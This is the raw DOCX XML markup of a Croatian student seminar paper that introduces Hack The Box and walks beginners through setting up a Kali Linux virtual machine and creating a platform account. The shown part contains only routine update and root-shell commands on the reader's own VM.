                <w:lang w:eastAsia="hr-HR"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Foothold</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc75785398 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48B9E084" w14:textId="77777777" w:rsidR="004472D0" w:rsidRDefault="00E602CA">
          <w:pPr>
            <w:pStyle w:val="Sadra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r-HR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc75785399" w:history="1">
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="hr-HR"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc75785399 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1DE7102E" w14:textId="77777777" w:rsidR="004472D0" w:rsidRDefault="00E602CA">
          <w:pPr>
            <w:pStyle w:val="Sadraj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75785400" w:history="1">
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Zaključak</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc75785400 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20A04699" w14:textId="31C5B729" w:rsidR="006A4EBE" w:rsidRDefault="006A4EBE" w:rsidP="006A4EBE">
          <w:r w:rsidRPr="00C66C3B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3FC12756" w14:textId="77777777" w:rsidR="006A4EBE" w:rsidRDefault="006A4EBE" w:rsidP="006A4EBE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="700EDA38" w14:textId="1A24EDE1" w:rsidR="006A4EBE" w:rsidRDefault="00E87A78" w:rsidP="006A4EBE">
      <w:pPr>
        <w:pStyle w:val="Naslov1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_Toc75785389"/>
      <w:r w:rsidR="006A4EBE">
        <w:t>Uvod</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="3F0685BD" w14:textId="3F8AC1C7" w:rsidR="00F9627C" w:rsidRDefault="000C4BDF" w:rsidP="00E558FF">
      <w:pPr>
        <w:ind w:firstLine="431"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hack The Box je web platforma koja omogućuje svima, </w:t>
      </w:r>
      <w:r w:rsidRPr="000C4BDF">
        <w:t xml:space="preserve">od početnika do stručnjaka, da dalje razvijaju i unapređuju svoje vještine </w:t>
      </w:r>
      <w:r>
        <w:t>hakiranja i unaprijeđuju znanje o Internet sigurnosti</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4BDF">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C4BDF">
        <w:t xml:space="preserve">Hack the Box nudi razne virtualne </w:t>
      </w:r>
      <w:r>
        <w:t>mašine</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4BDF">
        <w:t xml:space="preserve"> temeljene na različitim operativnim sustavima i inačicama softvera s različitim ranjivostima</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> koje moramo o</w:t>
      </w:r>
      <w:r w:rsidR="00E35BBA">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>kriti te iskoristiti</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4BDF">
        <w:t>. Ne postoje dv</w:t>
      </w:r>
      <w:r>
        <w:t>ije iste virtualne mašine</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4BDF">
        <w:t xml:space="preserve">. Svaka od njih zahtijeva drugačiju metodu kako bi </w:t>
      </w:r>
      <w:r>
        <w:t>došli do cilja, a</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4BDF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4BDF">
        <w:t>ilj je jednostavan: isko</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ristiti </w:t>
      </w:r>
      <w:r w:rsidR="00E35BBA">
        <w:t>ranjivosti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sustava</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4BDF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>odabrane mašine</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4BDF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">da bi došli do vrijednih podataka koje svaka mašina sadrži, odnosno zastava (eng. Flags) </w:t>
      </w:r>
      <w:r w:rsidR="00F9627C">
        <w:t>koje potom objavimo na samoj Hack The Box stranici</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4BDF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F9627C">
        <w:t xml:space="preserve"> Za </w:t>
      </w:r>
      <w:r w:rsidR="00E35BBA">
        <w:t>svaku objavlje</w:t>
      </w:r>
      <w:r w:rsidR="00F9627C">
        <w:t>nu zastavu korisnik je nagrađen Hack The Box bodovima te ovisno o broju bodova korisnik ostvaruje razne pogodnosti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5CAFA4" w14:textId="386017AA" w:rsidR="00F9627C" w:rsidRDefault="00F9627C" w:rsidP="00E558FF">
      <w:r>
        <w:t>U ovom seminaru ćemo napisati vodič i dati nekoliko savjeta o etičkom hakiranju različitih virtualnih mašina unutar Hack The Box platforme. Mi nikako nismo stručnjaci po temi Internet sigurnosti i etičnog hakiranja. Iza nas je samo nekoliko tjedana rada tako da će ovo biti vodič od početnika za početnike.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6303519F" w14:textId="115F2A30" w:rsidR="00B37906" w:rsidRDefault="00E558FF" w:rsidP="00E558FF">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E3346B" w14:textId="2E4F7011" w:rsidR="00B37906" w:rsidRDefault="00B37906" w:rsidP="00B37906">
      <w:pPr>
        <w:pStyle w:val="Naslov2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc75785390"/>
      <w:r w:rsidRPr="00B37906">
        <w:lastRenderedPageBreak/>
        <w:t>Kali Linux</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="388B0DEC" w14:textId="77777777" w:rsidR="00E558FF" w:rsidRPr="00E558FF" w:rsidRDefault="00E558FF" w:rsidP="00E558FF"/>
    <w:p w14:paraId="449522E3" w14:textId="6EA6FD4E" w:rsidR="00B37906" w:rsidRDefault="00B37906" w:rsidP="00B37906">
      <w:pPr>
        <w:ind w:firstLine="576"/>
      </w:pPr>
      <w:r w:rsidRPr="00B37906">
        <w:t>Kali Linux je Linux distribucija zasnovana na Debianu. Namijenjen je digitalnoj forenzici, testiranju probojnosti i hakiranju.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072687F3" w14:textId="4925D295" w:rsidR="00B37906" w:rsidRDefault="00B37906" w:rsidP="00B37906">
      <w:r>
        <w:t xml:space="preserve">Za potrebe ovog seminarskog rada koristimo Kali Linux okruženje. Iako je moguće hakirati preko gotovo bilo kojeg uređaja, odabrali smo Kali Linux jer </w:t>
      </w:r>
      <w:r w:rsidRPr="00B37906">
        <w:t xml:space="preserve">sadrži preko 600 instaliranih programa za testiranje ranjivosti. Može se pokrenuti s računalnog hard diska, sa </w:t>
      </w:r>
      <w:r w:rsidRPr="004E68C1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>live CD</w:t>
      </w:r>
      <w:r w:rsidRPr="00B37906">
        <w:t xml:space="preserve"> ili </w:t>
      </w:r>
      <w:r w:rsidRPr="004E68C1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>live USB</w:t>
      </w:r>
      <w:r w:rsidRPr="00B37906">
        <w:t xml:space="preserve"> distribucija, ili uz pomoć programa za virtualizaciju operativnih sustava.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mi koristimo </w:t>
      </w:r>
      <w:r w:rsidRPr="00B37906">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Oracle VM VirtualBox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> program za virtualizaciju kojeg možete skinuti </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00B37906">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>ovdje.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E558FF">
        <w:t xml:space="preserve"> Link za instalaciju Kali Linuxa je </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00E558FF" w:rsidRPr="00E558FF">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>ovdje.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E558FF">
        <w:t xml:space="preserve"> Upute za </w:t>
      </w:r>
      <w:r w:rsidR="00E35BBA">
        <w:t>instalaciju</w:t>
      </w:r>
      <w:r w:rsidR="00E558FF">
        <w:t xml:space="preserve"> svih potrebnih programa možete pronaći </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00E558FF" w:rsidRPr="00E558FF">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>ovdje.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E558FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258F6A2D" w14:textId="6829B1A0" w:rsidR="00E558FF" w:rsidRDefault="00E558FF" w:rsidP="00B37906"/>
    <w:p w14:paraId="1188D896" w14:textId="7434453D" w:rsidR="00E558FF" w:rsidRDefault="00E558FF" w:rsidP="00E558FF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6C83C1B0" wp14:editId="0625D3A0">
            <wp:extent cx="5762625" cy="2914650"/>
            <wp:effectExtent l="0" t="0" r="9525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FA2F" w14:textId="120E273E" w:rsidR="00B37906" w:rsidRDefault="00E558FF" w:rsidP="003D7C18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1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A8218F">
        <w:t>. Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A93A8E" w14:textId="1752CAB9" w:rsidR="00D5333E" w:rsidRDefault="00D5333E" w:rsidP="00E558FF"/>
    <w:p w14:paraId="5E37E7A2" w14:textId="21BE162F" w:rsidR="00E11CAF" w:rsidRDefault="00E11CAF" w:rsidP="00E558FF"/>
    <w:p w14:paraId="1465C4DF" w14:textId="77777777" w:rsidR="00E11CAF" w:rsidRPr="00E558FF" w:rsidRDefault="00E11CAF" w:rsidP="00E558FF"/>
    <w:p w14:paraId="27B711E0" w14:textId="7DD642E3" w:rsidR="00E11CAF" w:rsidRDefault="00E558FF" w:rsidP="00D5333E">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E558FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VAŽNO !!!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sve </w:t>
      </w:r>
      <w:r w:rsidR="00E35BBA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>daljnje</w:t>
      </w:r>
      <w:r w:rsidR="00D5333E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> upute se moraju izvesti unutar </w:t>
      </w:r>
      <w:r w:rsidR="00D5333E" w:rsidRPr="004E68C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Kali Linux</w:t>
      </w:r>
      <w:r w:rsidR="00D5333E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> virtualne mašine</w:t>
      </w:r>
      <w:r w:rsidR="004E68C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> koju ćemo kroz seminar nazivati lokalno računalo</w:t>
      </w:r>
      <w:r w:rsidR="00D5333E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3535919F" w14:textId="5759F35A" w:rsidR="00E11CAF" w:rsidRPr="00E11CAF" w:rsidRDefault="00E11CAF" w:rsidP="00E11CAF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  <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Za početak, potrebno je upaliti </w:t>
      </w:r>
      <w:r w:rsidRPr="00A8218F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Kali Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> virtualnu mašinu te pripremiti teren za hakiranje. Prvo što ćemo napraviti jest </w:t>
      </w:r>
      <w:r w:rsidRPr="00E11CAF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>updatati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cijeli sustav tako da otvorimo terminal i izvršiti sljedeće naredbe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63205308" w14:textId="77777777" w:rsidR="00E11CAF" w:rsidRDefault="00E11CAF" w:rsidP="00E11CAF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Hlk75763421"/>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD032A">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r>
        <w:t>apt update</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:p w14:paraId="6A1E44AD" w14:textId="77777777" w:rsidR="00E11CAF" w:rsidRDefault="00E11CAF" w:rsidP="00E11CAF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4A8ECE27" wp14:editId="638780D0">
            <wp:extent cx="4581525" cy="2945807"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="2" name="Slika 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021" cy="296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9AD5" w14:textId="52842278" w:rsidR="00E11CAF" w:rsidRDefault="00E11CAF" w:rsidP="003D7C18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2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A8218F">
        <w:t>. Kali update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2732A5CE" w14:textId="77777777" w:rsidR="00E11CAF" w:rsidRPr="00E11CAF" w:rsidRDefault="00E11CAF" w:rsidP="00E11CAF"/>
    <w:p w14:paraId="2469AC21" w14:textId="77777777" w:rsidR="00E11CAF" w:rsidRPr="00E11CAF" w:rsidRDefault="00E11CAF" w:rsidP="00E11CAF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD032A">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r>
        <w:t>apt upgrade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FD4429" w14:textId="77777777" w:rsidR="00E11CAF" w:rsidRDefault="00E11CAF" w:rsidP="00E11CAF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606592D0" wp14:editId="33BE1AF1">
            <wp:extent cx="4552950" cy="2412159"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="9" name="Slika 9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9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49"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4582383" cy="242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8807" w14:textId="546F7A9F" w:rsidR="00E11CAF" w:rsidRDefault="00E11CAF" w:rsidP="003D7C18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3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A8218F">
        <w:t>. Kali upgrade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6B31AF" w14:textId="77777777" w:rsidR="00E11CAF" w:rsidRPr="00E11CAF" w:rsidRDefault="00E11CAF" w:rsidP="00E11CAF"/>
    <w:p w14:paraId="515DE8CF" w14:textId="5D0FA148" w:rsidR="00E11CAF" w:rsidRDefault="00E11CAF" w:rsidP="00E11CAF">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Drugu naredbu potvrdite upisivanjem slova '</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11CAF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>' u terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAB3201" w14:textId="77777777" w:rsidR="00E11CAF" w:rsidRDefault="00E11CAF" w:rsidP="00E11CAF">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AB91CB3" w14:textId="7D3A30DC" w:rsidR="00E11CAF" w:rsidRDefault="00E11CAF" w:rsidP="00E11CAF">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E11CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>avjet :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003D7C18">
        <w:t xml:space="preserve">U svakom novom terminalu </w:t>
      </w:r>
      <w:r w:rsidR="00A80EEE" w:rsidRPr="003D7C18">
        <w:t>izvršite ovu naredbu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C716ABF" w14:textId="661900EB" w:rsidR="00A80EEE" w:rsidRDefault="00A80EEE" w:rsidP="00E11CAF">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C654325" w14:textId="41F3B6E1" w:rsidR="00A80EEE" w:rsidRPr="00E11CAF" w:rsidRDefault="00A80EEE" w:rsidP="00A80EEE">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD032A">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r>
        <w:t>su</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F98A348" w14:textId="77777777" w:rsidR="00A80EEE" w:rsidRDefault="00A80EEE" w:rsidP="00A80EEE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0016752E" wp14:editId="2FC8E297">
            <wp:extent cx="4667250" cy="819150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27E9" w14:textId="6F2F823B" w:rsidR="00A80EEE" w:rsidRDefault="00A80EEE" w:rsidP="003D7C18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4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A8218F">
        <w:t xml:space="preserve"> Kali root ovlasti</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544172C4" w14:textId="77777777" w:rsidR="003D7C18" w:rsidRPr="003D7C18" w:rsidRDefault="003D7C18" w:rsidP="003D7C18"/>
    <w:p w14:paraId="059BF92E" w14:textId="53F0BD1E" w:rsidR="00E558FF" w:rsidRPr="00E558FF" w:rsidRDefault="003D7C18" w:rsidP="00D5333E">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tako ste dobili sva administratorska, odnosno </w:t>
      </w:r>
      <w:r w:rsidRPr="003D7C18">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> prava vaše </w:t>
      </w:r>
      <w:r w:rsidRPr="00A8218F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Kali Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> virtualne mašine i tako si možete uvelike olakšati daljnji rad.</w:t>
      </w:r>
      <w:r w:rsidR="00E558FF" w:rsidRPr="00E558FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4189D4A7" w14:textId="6A606CC1" w:rsidR="00F9627C" w:rsidRPr="00B37906" w:rsidRDefault="00E62C57" w:rsidP="00B37906">
      <w:pPr>
        <w:pStyle w:val="Naslov2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc75785391"/>
      <w:r w:rsidRPr="00B37906">
        <w:lastRenderedPageBreak/>
        <w:t>Hack The Box</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="2F5E8BC5" w14:textId="77777777" w:rsidR="00E11CAF" w:rsidRPr="00E11CAF" w:rsidRDefault="00E11CAF" w:rsidP="00E11CAF">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24CF7271" w14:textId="7CC9806A" w:rsidR="00E62C57" w:rsidRDefault="00E120B5" w:rsidP="00E120B5">
      <w:r>
        <w:t xml:space="preserve">Sljedeće je </w:t>
      </w:r>
      <w:r w:rsidR="00E62C57">
        <w:t xml:space="preserve">potrebno napraviti račun za Hack The Box web platformu. Poveznicu za Hack The Box stranicu možete pronaći </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00E62C57" w:rsidRPr="00E62C57">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>ovdje.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E62C57">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C234B1" w14:textId="77777777" w:rsidR="00E62C57" w:rsidRDefault="00E62C57" w:rsidP="00E62C57"/>
    <w:p w14:paraId="5E03CC6D" w14:textId="77777777" w:rsidR="00A80EEE" w:rsidRDefault="00E62C57" w:rsidP="00A80EEE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5A48DC7B" wp14:editId="640B2631">
            <wp:extent cx="5743575" cy="2838450"/>
            <wp:effectExtent l="0" t="0" r="9525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46AE" w14:textId="40557C9F" w:rsidR="00E62C57" w:rsidRDefault="00E62C57" w:rsidP="003D7C18">
      <w:pPr>
        <w:pStyle w:val="Opisslike"/>
      </w:pPr>
      <w:r w:rsidRPr="00E62C57">
        <w:t xml:space="preserve">Slika </w:t>
      </w:r>
      <w:r w:rsidRPr="00E62C57">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E62C57">
        <w:instrText xml:space="preserve"> SEQ Slika \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E62C57">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0021519D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00E62C57">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E62C57">
        <w:t>. Hack The Box web platforma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229D787C" w14:textId="0898EE24" w:rsidR="00E62C57" w:rsidRDefault="00E62C57" w:rsidP="00E62C57">
      <w:r>
        <w:t>Nakon što napravite korisnički račun, prijavite se svojim korisničkim podacima u stranicu. Trebao bi vas dočekati zaslon dobrodošlice kao na slici:</w:t>
      </w:r>
    </w:p>
